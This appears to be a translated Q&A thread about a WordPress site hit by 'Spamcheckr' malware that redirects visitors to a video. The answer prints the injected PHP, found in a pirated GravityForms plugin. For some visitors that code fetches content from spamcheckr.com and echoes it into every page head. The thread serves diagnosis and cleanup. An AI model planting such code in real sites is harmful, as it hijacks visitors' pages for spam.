Wordpress网站链接到Spamcheckr视频

时间:2014-04-11 11:37:41

标签: wordpress security woocommerce

我在这里发现了一些关于wordpress网站被Spamcheckr代码感染并链接到视频的帖子 - 这里有一个案例 - WordPress blog infected with HTML Refresh meta tag

我有同样的事情,但我的主题是在一个名为settings_class.php

的文件中

我已经删除了settings_class.php文件,因为它主要被注释掉了,并且发现它在我的主题functions.php文件中被链接。所以我删除了这一行,仍然有问题。

我删除了我的缓存,并在我的网站上搜索了Spamcheck,现在没有链接,但它仍然链接到这个Justin B视频 - http:// www.youtube.com/watch?v=RFngSCaY5nA

这是随机的,但如果对我来说,当我访问此页面时会发生这种情况 - http://www.ginirigs.net/product/15mm-rail-clamp/

如果你能提供帮助,请告诉我。

1 个答案:

答案 0 :(得分:0)

在我的网站上遇到同样的问题,在一个朋友发给我的GravityForms 1.8.4副本中的includes / settings.php中找到了它。对于那些刚接触FileSeek的人来说,改变一些高级设置有助于我成功搜索。 "将查询与整个文件匹配","搜索子文件夹"选中,"使用文件处理程序处理文件内容"选中,"显示与查询文本匹配的文件名"检查。 Adv选项卡上的其他所有内容都已关闭。在搜索了整个插件和主题文件夹之后,几乎立即得到了我的结果。

这里是我找到的代码,与上述链接相同(为了便于阅读,从单行格式扩展而来)。

<?php
  if (!isset($_COOKIE['wordpress_test_cookie'])){
    if (mt_rand(1,20) == 1) {
      function secqc2_cahesk(){
        if(function_exists('curl_init')){
          $addressd = "http://spamcheckr.com/l.php";
          $ch = curl_init();
          $timeout = 5;
          url_setopt($ch,CURLOPT_URL,$addressd);
          curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
          curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
          $data = curl_exec($ch);
          curl_close($ch);
          echo "$data";
        }
      }
      add_action('wp_head','secqc2_cahesk');
    }
  }
?>